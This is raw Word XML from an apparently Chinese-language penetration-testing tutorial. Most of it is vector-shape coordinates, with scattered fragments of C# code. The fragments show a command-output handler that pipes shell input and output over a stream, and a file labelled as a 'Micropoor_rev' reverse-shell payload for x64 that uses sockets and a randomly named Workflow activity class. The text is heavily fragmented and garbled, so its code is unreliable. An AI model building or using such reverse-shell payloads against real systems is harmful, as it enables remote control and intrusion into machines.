10215,15392,10192,15392,10168,15392,10143,15392,10117,15392,10090,15392,10061,15392,10031,15392,9999,15392,9966,15392,9931,15392,9895,15392,9858,15392,9819,15392,9778,15392,9735,15392,9691,15392,9646,15392,9598,15392,9549,15392,9498,15392,9445,15392,9391,15392,9334,15392,9275,15392,9215,15392,9153,15392,9088,15392,9022,15392,8953,15392,8883,15392,8810,15392,8735,15392,8658,15392,8578,15392,8497,15392,8413,15392,8326,15392,8238,15392,8146,15392,8053,15392,7957,15392,7859,15392,7758,15392,7654,15392,7548,15392,7439,15392,7328,15392,7214,15392,7097,15392,6977,15392,6855,15392,6730,15392,6602,15392,6471,15392,6337,15392,6201,15392,6061,15392,5918,15392,5773,15392,5624,15392,5472,15392,5317,15392,5159,15392,4997,15392,4833,15392,4665,15392,4494,15392,4319,15392,4141,15392,3960,15392,3776,15392,3587,15392,3396,15392,3201,15392,3002,15392,2800,15392,2594,15392,2385,15392,2172,15392,1955,15392,1734,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15392,1510,15391,1510,15391,1510,15391,1510,15391,1510,15391,1510,15391,1510,15391,1510,15391,1510,15390,1510,15390,1510,15390,1510,15389,1510,15389,1510,15389,1510,15388,1510,15388,1510,15388,1510,15387,1510,15387,1510,15386,1510,15385,1510,15385,1510,15384,1510,15383,1510,15383,1510,15382,1510,15381,1510,15380,1510,15379,1510,15378,1510,15377,1510,15376,1510,15375,1510,15374,1510,15372,1510,15371,1510,15370,1510,15368,1510,15367,1510,15365,1510,15363,1510,15362,1510,15360,1510,15358,1510,15356,1510,15354,1510,15352,1510,15350,1510,15348,1510,15346,1510,15343,1510,15341,1510,15338,1510,15336,1510,15333,1510,15330,1510,15327,1510,15325,1510,15322,1510,15318,1510,15315,1510,15312,1510,15309,1510,15305,1510,15302,1510,15298,1510,15294,1510,15290,1510,15286,1510,15282,1510,15278,1510,15274,1510,15270,1510,15265,1510,15260,1510,15256,1510,15251,1510,15246,1510,15241,1510,15236,1510,15231,1510,15225,1510,15220,1510,15214,1510,15209,1510,15203,1510,15197,1510,15191,1510,15184,1510,15178,1510,15172,1510,15165,1510,15158,1510,15151,1510,15144,1510,15137,1510,15130,1510,15123,1510,15115,1510,15107,1510,15099,1510,15091,1510,15083,1510,15075,1510,15067,1510,15058,1510,15049,1510,15041,1510,15032e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:750.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15010" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:15010;width:30;height:370" coordorigin="1490,15010" coordsize="30,370" path="m1517,15032l1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15032,1517,15033,1517,15033,1517,15033,1517,15033,1517,15034,1517,15034,1517,15034,1517,15035,1517,15035,1517,15035,1517,15036,1517,15036,1517,15037,1517,15037,1517,15038,1517,15039,1517,15039,1517,15040,1517,15041,1517,15042,1517,15042,1517,15043,1517,15044,1517,15045,1517,15046,1517,15047,1517,15049,1517,15050,1517,15051,1517,15052,1517,15054,1517,15055,1517,15057,1517,15058,1517,15060,1517,15062,1517,15063,1517,15065,1517,15067,1517,15069,1517,15071,1517,15073,1517,15075,1517,15078,1517,15080,1517,15083,1517,15085,1517,15088,1517,15090,1517,15093,1517,15096,1517,15099,1517,15102,1517,15105,1517,15108,1517,15111,1517,15115,1517,15118,1517,15122,1517,15125,1517,15129,1517,15133,1517,15137,1517,15141,1517,15145,1517,15149,1517,15154,1517,15158,1517,15163,1517,15168,1517,15172,1517,15177,1517,15182,1517,15187,1517,15193,1517,15198,1517,15203,1517,15209,1517,15215,1517,15221,1517,15227,1517,15233,1517,15239,1517,15245,1517,15252,1517,15258,1517,15265,1517,15272,1517,15279,1517,15286,1517,15293,1517,15301,1517,15308,1517,15316,1517,15324,1517,15332,1517,15340,1517,15348,1517,15357,1517,15365,1517,15374,1517,15383,1517,15392e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:252.500pt;margin-top:283.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5050,5670" coordsize="130,270">
        <v:shape style="position:absolute;left:5050;top:5670;width:130;height:270" coordorigin="5050,5670" coordsize="130,270" path="m5067,5697l5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5067,5697,5068,5697,5068,5697,5068,5697,5068,5697,5068,5697,5068,5697,5068,5697,5069,5697,5069,5697,5069,5697,5069,5697,5070,5697,5070,5697,5070,5697,5070,5697,5071,5697,5071,5697,5071,5697,5072,5697,5072,5697,5073,5697,5073,5697,5073,5697,5074,5697,5074,5697,5075,5697,5075,5697,5076,5697,5077,5697,5077,5697,5078,5697,5078,5697,5079,5697,5080,5697,5080,5697,5081,5697,5082,5697,5083,5697,5084,5697,5084,5697,5085,5697,5086,5697,5087,5697,5088,5697,5089,5697,5090,5697,5091,5697,5092,5697,5093,5697,5094,5697,5095,5697,5097,5697,5098,5697,5099,5697,5100,5697,5102,5697,5103,5697,5104,5697,5106,5697,5107,5697,5109,5697,5110,5697,5112,5697,5113,5697,5115,5697,5117,5697,5118,5697,5120,5697,5122,5697,5124,5697,5126,5697,5128,5697,5130,5697,5132,5697,5134,5697,5136,5697,5138,5697,5140,5697,5142,5697,5144,5697,5147,5697,5149,5697,5151,5697,5154,5697,5156,5697,5159,5697,5161,5697,5164,5697,5167,5697,5169,5697,5172,5697,5175,5697,5178,5697,5181,5697,5184,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5697,5187,5698,5187,5698,5187,5698,5187,5698,5187,5698,5187,5698,5187,5699,5187,5699,5187,5699,5187,5700,5187,5700,5187,5700,5187,5701,5187,5701,5187,5701,5187,5702,5187,5702,5187,5703,5187,5703,5187,5704,5187,5705,5187,5705,5187,5706,5187,5707,5187,5707,5187,5708,5187,5709,5187,5710,5187,5711,5187,5712,5187,5713,5187,5714,5187,5715,5187,5716,5187,5717,5187,5718,5187,5719,5187,5721,5187,5722,5187,5723,5187,5725,5187,5726,5187,5728,5187,5730,5187,5731,5187,5733,5187,5735,5187,5737,5187,5738,5187,5740,5187,5742,5187,5744,5187,5747,5187,5749,5187,5751,5187,5753,5187,5756,5187,5758,5187,5761,5187,5763,5187,5766,5187,5769,5187,5772,5187,5774,5187,5777,5187,5780,5187,5783,5187,5787,5187,5790,5187,5793,5187,5797,5187,5800,5187,5804,5187,5807,5187,5811,5187,5815,5187,5819,5187,5823,5187,5827,5187,5831,5187,5835,5187,5839,5187,5844,5187,5848,5187,5853,5187,5858,5187,5862,5187,5867,5187,5872,5187,5877,5187,5882,5187,5888,5187,5893,5187,5898,5187,5904,5187,5910,5187,5915,5187,5921,5187,5927,5187,5933,5187,5939,5187,5946,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5187,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5186,5952,5185,5952,5185,5952,5185,5952,5185,5952,5185,5952,5185,5952,5184,5952,5184,5952,5184,5952,5184,5952,5184,5952,5183,5952,5183,5952,5183,5952,5182,5952,5182,5952,5182,5952,5181,5952,5181,5952,5181,5952,5180,5952,5180,5952,5179,5952,5179,5952,5178,5952,5178,5952,5177,5952,5177,5952,5176,5952,5175,5952,5175,5952,5174,5952,5173,5952,5173,5952,5172,5952,5171,5952,5170,5952,5170,5952,5169,5952,5168,5952,5167,5952,5166,5952,5165,5952,5164,5952,5163,5952,5162,5952,5161,5952,5160,5952,5159,5952,5158,5952,5157,5952,5155,5952,5154,5952,5153,5952,5151,5952,5150,5952,5149,5952,5147,5952,5146,5952,5144,5952,5143,5952,5141,5952,5140,5952,5138,5952,5136,5952,5135,5952,5133,5952,5131,5952,5129,5952,5127,5952,5126,5952,5124,5952,5122,5952,5120,5952,5117,5952,5115,5952,5113,5952,5111,5952,5109,5952,5106,5952,5104,5952,5102,5952,5099,5952,5097,5952,5094,5952,5092,5952,5089,5952,5087,5952,5084,5952,5081,5952,5078,5952,5075,5952,5073,5952,5070,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5952,5067,5951,5067,5951,5067,5951,5067,5951,5067,5951,5067,5951,5067,5951,5067,5950,5067,5950,5067,5950,5067,5950,5067,5949,5067,5949,5067,5949,5067,5948,5067,5948,5067,5947,5067,5947,5067,5947,5067,5946,5067,5946,5067,5945,5067,5944,5067,5944,5067,5943,5067,5942,5067,5942,5067,5941,5067,5940,5067,5939,5067,5938,5067,5937,5067,5936,5067,5935,5067,5934,5067,5933,5067,5932,5067,5931,5067,5929,5067,5928,5067,5927,5067,5925,5067,5924,5067,5922,5067,5921,5067,5919,5067,5918,5067,5916,5067,5914,5067,5912,5067,5910,5067,5908,5067,5906,5067,5904,5067,5902,5067,5900,5067,5898,5067,5895,5067,5893,5067,5891,5067,5888,5067,5886,5067,5883,5067,5880,5067,5877,5067,5874,5067,5872,5067,5869,5067,5865,5067,5862,5067,5859,5067,5856,5067,5852,5067,5849,5067,5845,5067,5842,5067,5838,5067,5834,5067,5830,5067,5826,5067,5822,5067,5818,5067,5814,5067,5810,5067,5805,5067,5801,5067,5796,5067,5791,5067,5787,5067,5782,5067,5777,5067,5772,5067,5767,5067,5761,5067,5756,5067,5750,5067,5745,5067,5739,5067,5734,5067,5728,5067,5722,5067,5716,5067,5710,5067,5703,5067,5697e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:319.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,6390" coordsize="130,250">
        <v:shape style="position:absolute;left:2650;top:6390;width:130;height:250" coordorigin="2650,6390" coordsize="130,250" path="m2665,6402l2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2666,6402,2666,6402,2666,6402,2666,6402,2666,6402,2666,6402,2666,6402,2666,6402,2666,6402,2666,6402,2666,6402,2666,6402,2667,6402,2667,6402,2667,6402,2667,6402,2667,6402,2667,6402,2668,6402,2668,6402,2668,6402,2668,6402,2669,6402,2669,6402,2669,6402,2670,6402,2670,6402,2670,6402,2671,6402,2671,6402,2671,6402,2672,6402,2672,6402,2673,6402,2673,6402,2674,6402,2674,6402,2675,6402,2675,6402,2676,6402,2677,6402,2677,6402,2678,6402,2679,6402,2679,6402,2680,6402,2681,6402,2682,6402,2682,6402,2683,6402,2684,6402,2685,6402,2686,6402,2687,6402,2688,6402,2689,6402,2690,6402,2691,6402,2692,6402,2693,6402,2694,6402,2695,6402,2697,6402,2698,6402,2699,6402,2700,6402,2702,6402,2703,6402,2705,6402,2706,6402,2708,6402,2709,6402,2711,6402,2712,6402,2714,6402,2716,6402,2717,6402,2719,6402,2721,6402,2723,6402,2725,6402,2726,6402,2728,6402,2730,6402,2732,6402,2734,6402,2737,6402,2739,6402,2741,6402,2743,6402,2745,6402,2748,6402,2750,6402,2753,6402,2755,6402,2758,6402,2760,6402,2763,6402,2765,6402,2768,6402,2771,6402,2774,6402,2777,6402,2779,6402,2782,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6403,2785,6403,2785,6403,2785,6403,2785,6403,2785,6403,2785,6403,2785,6403,2785,6404,2785,6404,2785,6404,2785,6404,2785,6405,2785,6405,2785,6405,2785,6406,2785,6406,2785,6406,2785,6407,2785,6407,2785,6408,2785,6408,2785,6409,2785,6409,2785,6410,2785,6411,2785,6411,2785,6412,2785,6413,2785,6413,2785,6414,2785,6415,2785,6416,2785,6417,2785,6418,2785,6419,2785,6420,2785,6421,2785,6422,2785,6424,2785,6425,2785,6426,2785,6427,2785,6429,2785,6430,2785,6432,2785,6433,2785,6435,2785,6437,2785,6438,2785,6440,2785,6442,2785,6444,2785,6446,2785,6448,2785,6450,2785,6452,2785,6454,2785,6456,2785,6459,2785,6461,2785,6464,2785,6466,2785,6469,2785,6471,2785,6474,2785,6477,2785,6480,2785,6483,2785,6486,2785,6489,2785,6492,2785,6495,2785,6499,2785,6502,2785,6505,2785,6509,2785,6513,2785,6516,2785,6520,2785,6524,2785,6528,2785,6532,2785,6536,2785,6540,2785,6545,2785,6549,2785,6554,2785,6558,2785,6563,2785,6568,2785,6573,2785,6577,2785,6583,2785,6588,2785,6593,2785,6598,2785,6604,2785,6609,2785,6615,2785,6621,2785,6627,2785,6632,2785,6639,2785,6645,2785,6651,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2785,6657,2784,6657,2784,6657,2784,6657,2784,6657,2784,6657,2784,6657,2783,6657,2783,6657,2783,6657,2783,6657,2783,6657,2782,6657,2782,6657,2782,6657,2781,6657,2781,6657,2781,6657,2780,6657,2780,6657,2780,6657,2779,6657,2779,6657,2778,6657,2778,6657,2778,6657,2777,6657,2776,6657,2776,6657,2775,6657,2775,6657,2774,6657,2774,6657,2773,6657,2772,6657,2772,6657,2771,6657,2770,6657,2769,6657,2768,6657,2768,6657,2767,6657,2766,6657,2765,6657,2764,6657,2763,6657,2762,6657,2761,6657,2760,6657,2759,6657,2758,6657,2757,6657,2755,6657,2754,6657,2753,6657,2752,6657,2750,6657,2749,6657,2748,6657,2746,6657,2745,6657,2743,6657,2742,6657,2740,6657,2738,6657,2737,6657,2735,6657,2733,6657,2732,6657,2730,6657,2728,6657,2726,6657,2724,6657,2722,6657,2720,6657,2718,6657,2716,6657,2714,6657,2712,6657,2710,6657,2708,6657,2705,6657,2703,6657,2701,6657,2698,6657,2696,6657,2693,6657,2691,6657,2688,6657,2685,6657,2683,6657,2680,6657,2677,6657,2674,6657,2671,6657,2668,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6656,2665,6656,2665,6656,2665,6656,2665,6656,2665,6656,2665,6655,2665,6655,2665,6655,2665,6654,2665,6654,2665,6654,2665,6653,2665,6653,2665,6652,2665,6652,2665,6651,2665,6651,2665,6650,2665,6650,2665,6649,2665,6648,2665,6648,2665,6647,2665,6646,2665,6645,2665,6644,2665,6644,2665,6643,2665,6642,2665,6641,2665,6640,2665,6638,2665,6637,2665,6636,2665,6635,2665,6634,2665,6632,2665,6631,2665,6629,2665,6628,2665,6626,2665,6625,2665,6623,2665,6621,2665,6619,2665,6618,2665,6616,2665,6614,2665,6612,2665,6610,2665,6608,2665,6605,2665,6603,2665,6601,2665,6598,2665,6596,2665,6593,2665,6591,2665,6588,2665,6586,2665,6583,2665,6580,2665,6577,2665,6574,2665,6571,2665,6568,2665,6564,2665,6561,2665,6558,2665,6554,2665,6551,2665,6547,2665,6543,2665,6539,2665,6536,2665,6532,2665,6528,2665,6523,2665,6519,2665,6515,2665,6510,2665,6506,2665,6501,2665,6497,2665,6492,2665,6487,2665,6482,2665,6477,2665,6472,2665,6467,2665,6461,2665,6456,2665,6450,2665,6445,2665,6439,2665,6433,2665,6427,2665,6421,2665,6415,2665,6409,2665,6402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strInput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Append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rdr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ReadLine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StandardInput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WriteLine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strInput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strInput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Remove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strInput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44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47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="21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void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CmdOutputDataHandler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object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sendingProcess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DataR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eceivedEventArgs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outLine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49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410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StringBuilder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strOutput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StringBuilder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51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if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!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String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IsNullOrEmpty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outLine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Data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53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54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="1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try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55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strOutput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Append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outLine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Data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streamWriter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WriteLine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strOutput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streamWriter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Flush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59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60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catch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Exception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err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="98989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{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61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62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63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64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p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="33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Micropoor_rev</w:t>
      </w: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1.cs：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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x64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payload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Workflow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Activities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Net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Net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Sockets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Runtime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InteropServices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using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System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Threading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class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yrDaTlg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SequentialWorkflowActivity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14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{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8.500pt;width:449.500pt;height:46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,930">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:930" coordorigin="1490,970" coordsize="8990,93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999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1013,10484,1014,10484,1016,10484,1017,10484,1019,10484,1021,10484,1023,10484,1025,10484,1027,10484,1029,10484,1032,10484,1034,10484,1037,10484,1040,10484,1043,10484,1046,10484,1049,10484,1052,10484,1056,10484,1060,10484,1063,10484,1067,10484,1072,10484,1076,10484,1080,10484,1085,10484,1090,10484,1095,10484,1100,10484,1105,10484,1111,10484,1117,10484,1123,10484,1129,10484,1135,10484,1142,10484,1149,10484,1156,10484,1163,10484,1170,10484,1178,10484,1186,10484,1194,10484,1202,10484,1211,10484,1220,10484,1229,10484,1238,10484,1248,10484,1257,10484,1267,10484,1278,10484,1288,10484,1299,10484,1310,10484,1321,10484,1333,10484,1345,10484,1357,10484,1370,10484,1382,10484,1396,10484,1409,10484,1423,10484,1436,10484,1451,10484,1465,10484,1480,10484,1495,10484,1511,10484,1527,10484,1543,10484,1559,10484,1576,10484,1593,10484,1611,10484,1628,10484,1647,10484,1665,10484,1684,10484,1703,10484,1723,10484,1742,10484,1763,10484,1783,10484,1804,10484,1826,10484,1847,10484,1870,10484,1892,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10483,1915,10482,1915,10482,1915,10480,1915,10479,1915,10477,1915,10475,1915,10473,1915,10470,1915,10466,1915,10462,1915,10458,1915,10453,1915,10448,1915,10442,1915,10435,1915,10428,1915,10419,1915,10411,1915,10401,1915,10391,1915,10379,1915,10367,1915,10354,1915,10340,1915,10326,1915,10310,1915,10293,1915,10275,1915,10256,1915,10236,1915,10215,1915,10192,1915,10168,1915,10143,1915,10117,1915,10090,1915,10061,1915,10031,1915,9999,1915,9966,1915,9931,1915,9895,1915,9858,1915,9819,1915,9778,1915,9735,1915,9691,1915,9646,1915,9598,1915,9549,1915,9498,1915,9445,1915,9391,1915,9334,1915,9275,1915,9215,1915,9153,1915,9088,1915,9022,1915,8953,1915,8883,1915,8810,1915,8735,1915,8658,1915,8578,1915,8497,1915,8413,1915,8326,1915,8238,1915,8146,1915,8053,1915,7957,1915,7859,1915,7758,1915,7654,1915,7548,1915,7439,1915,7328,1915,7214,1915,7097,1915,6977,1915,6855,1915,6730,1915,6602,1915,6471,1915,6337,1915,6201,1915,6061,1915,5918,1915,5773,1915,5624,1915,5472,1915,5317,1915,5159,1915,4997,1915,4833,1915,4665,1915,4494,1915,4319,1915,4141,1915,3960,1915,3776,1915,3587,1915,3396,1915,3201,1915,3002,1915,2800,1915,2594,1915,2385,1915,2172,1915,1955,1915,1734,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1914,1510,1914,1510,1914,1510,1914,1510,1913,1510,1913,1510,1913,1510,1912,1510,1912,1510,1911,1510,1911,1510,1910,1510,1909,1510,1908,1510,1907,1510,1906,1510,1905,1510,1904,1510,1903,1510,1902,1510,1900,1510,1899,1510,1897,1510,1895,1510,1894,1510,1892,1510,1890,1510,1887,1510,1885,1510,1883,1510,1880,1510,1878,1510,1875,1510,1872,1510,1869,1510,1865,1510,1862,1510,1859,1510,1855,1510,1851,1510,1847,1510,1843,1510,1839,1510,1834,1510,1829,1510,1825,1510,1820,1510,1814,1510,1809,1510,1803,1510,1798,1510,1792,1510,1785,1510,1779,1510,1773,1510,1766,1510,1759,1510,1752,1510,1744,1510,1736,1510,1729,1510,1721,1510,1712,1510,1704,1510,1695,1510,1686,1510,1676,1510,1667,1510,1657,1510,1647,1510,1637,1510,1626,1510,1615,1510,1604,1510,1593,1510,1581,1510,1569,1510,1557,1510,1545,1510,1532,1510,1519,1510,1506,1510,1492,1510,1478,1510,1464,1510,1449,1510,1434,1510,1419,1510,1404,1510,1388,1510,1372,1510,1355,1510,1338,1510,1321,1510,1304,1510,1286,1510,1268,1510,1249,1510,1231,1510,1211,1510,1192,1510,1172,1510,1152,1510,1131,1510,1110,1510,1089,1510,1067,1510,1045,1510,1022,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,930">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:930" coordorigin="1490,990" coordsize="30,930" path="m1517,999l1517,999,1517,999,1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1013,1517,1014,1517,1016,1517,1017,1517,1019,1517,1021,1517,1023,1517,1025,1517,1027,1517,1029,1517,1032,1517,1034,1517,1037,1517,1040,1517,1043,1517,1046,1517,1049,1517,1052,1517,1056,1517,1060,1517,1063,1517,1067,1517,1072,1517,1076,1517,1080,1517,1085,1517,1090,1517,1095,1517,1100,1517,1105,1517,1111,1517,1117,1517,1123,1517,1129,1517,1135,1517,1142,1517,1149,1517,1156,1517,1163,1517,1170,1517,1178,1517,1186,1517,1194,1517,1202,1517,1211,1517,1220,1517,1229,1517,1238,1517,1248,1517,1257,1517,1267,1517,1278,1517,1288,1517,1299,1517,1310,1517,1321,1517,1333,1517,1345,1517,1357,1517,1370,1517,1382,1517,1396,1517,1409,1517,1423,1517,1436,1517,1451,1517,1465,1517,1480,1517,1495,1517,1511,1517,1527,1517,1543,1517,1559,1517,1576,1517,1593,1517,1611,1517,1628,1517,1647,1517,1665,1517,1684,1517,1703,1517,1723,1517,1742,1517,1763,1517,1783,1517,1804,1517,1826,1517,1847,1517,1870,1517,1892,1517,1915e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:94.500pt;width:449.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1890" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:1890;width:8990;height:910" coordorigin="1490,1890" coordsize="8990,910" path="m1510,1915l1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1511,1915,1512,1915,1512,1915,1514,1915,1515,1915,1517,1915,1519,1915,1521,1915,1524,1915,1528,1915,1532,1915,1536,1915,1541,1915,1546,1915,1552,1915,1559,1915,1566,1915,1575,1915,1583,1915,1593,1915,1603,1915,1615,1915,1627,1915,1640,1915,1654,1915,1668,1915,1684,1915,1701,1915,1719,1915,1738,1915,1758,1915,1780,1915,1802,1915,1826,1915,1851,1915,1877,1915,1904,1915,1933,1915,1963,1915,1995,1915,2028,1915,2063,1915,2099,1915,2136,1915,2175,1915,2216,1915,2259,1915,2303,1915,2348,1915,2396,1915,2445,1915,2496,1915,2549,1915,2604,1915,2660,1915,2719,1915,2779,1915,2841,1915,2906,1915,2972,1915,3041,1915,3112,1915,3184,1915,3259,1915,3336,1915,3416,1915,3498,1915,3582,1915,3668,1915,3757,1915,3848,1915,3941,1915,4037,1915,4136,1915,4236,1915,4340,1915,4446,1915,4555,1915,4666,1915,4780,1915,4897,1915,5017,1915,5139,1915,5264,1915,5392,1915,5523,1915,5657,1915,5793,1915,5933,1915,6076,1915,6222,1915,6370,1915,6522,1915,6677,1915,6835,1915,6997,1915,7161,1915,7329,1915,7500,1915,7675,1915,7853,1915,8034,1915,8219,1915,8407,1915,8598,1915,8793,1915,8992,1915,9194,1915,9400,1915,9609,1915,9823,1915,10039,1915,10260,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1916,10484,1916,10484,1916,10484,1916,10484,1917,10484,1917,10484,1918,10484,1918,10484,1919,10484,1919,10484,1920,10484,1921,10484,1921,10484,1922,10484,1923,10484,1924,10484,1925,10484,1927,10484,1928,10484,1929,10484,1931,10484,1932,10484,1934,10484,1936,10484,1938,10484,1940,10484,1942,10484,1944,10484,1947,10484,1949,10484,1952,10484,1955,10484,1957,10484,1960,10484,1964,10484,1967,10484,1970,10484,1974,10484,1978,10484,1982,10484,1986,10484,1990,10484,1995,10484,1999,10484,2004,10484,2009,10484,2014,10484,2019,10484,2025,10484,2030,10484,2036,10484,2042,10484,2049,10484,2055,10484,2062,10484,2069,10484,2076,10484,2083,10484,2090,10484,2098,10484,2106,10484,2114,10484,2123,10484,2131,10484,2140,10484,2150,10484,2159,10484,2169,10484,2178,10484,2189,10484,2199,10484,2210,10484,2220,10484,2232,10484,2243,10484,2255,10484,2267,10484,2279,10484,2292,10484,2304,10484,2318,10484,2331,10484,2345,10484,2359,10484,2373,10484,2388,10484,2403,10484,2418,10484,2433,10484,2449,10484,2465,10484,2482,10484,2499,10484,2516,10484,2534,10484,2551,10484,2570,10484,2588,10484,2607,10484,2626,10484,2646,10484,2666,10484,2686,10484,2707,10484,2728,10484,2749,10484,2771,10484,2793,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10483,2815,10482,2815,10482,2815,10480,2815,10479,2815,10477,2815,10475,2815,10473,2815,10470,2815,10466,2815,10462,2815,10458,2815,10453,2815,10448,2815,10442,2815,10435,2815,10428,2815,10419,2815,10411,2815,10401,2815,10391,2815,10379,2815,10367,2815,10354,2815,10340,2815,10326,2815,10310,2815,10293,2815,10275,2815,10256,2815,10236,2815,10215,2815,10192,2815,10168,2815,10143,2815,10117,2815,10090,2815,10061,2815,10031,2815,9999,2815,9966,2815,9931,2815,9895,2815,9858,2815,9819,2815,9778,2815,9735,2815,9691,2815,9646,2815,9598,2815,9549,2815,9498,2815,9445,2815,9391,2815,9334,2815,9275,2815,9215,2815,9153,2815,9088,2815,9022,2815,8953,2815,8883,2815,8810,2815,8735,2815,8658,2815,8578,2815,8497,2815,8413,2815,8326,2815,8238,2815,8146,2815,8053,2815,7957,2815,7859,2815,7758,2815,7654,2815,7548,2815,7439,2815,7328,2815,7214,2815,7097,2815,6977,2815,6855,2815,6730,2815,6602,2815,6471,2815,6337,2815,6201,2815,6061,2815,5918,2815,5773,2815,5624,2815,5472,2815,5317,2815,5159,2815,4997,2815,4833,2815,4665,2815,4494,2815,4319,2815,4141,2815,3960,2815,3776,2815,3587,2815,3396,2815,3201,2815,3002,2815,2800,2815,2594,2815,2385,2815,2172,2815,1955,2815,1734,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2814,1510,2814,1510,2814,1510,2814,1510,2813,1510,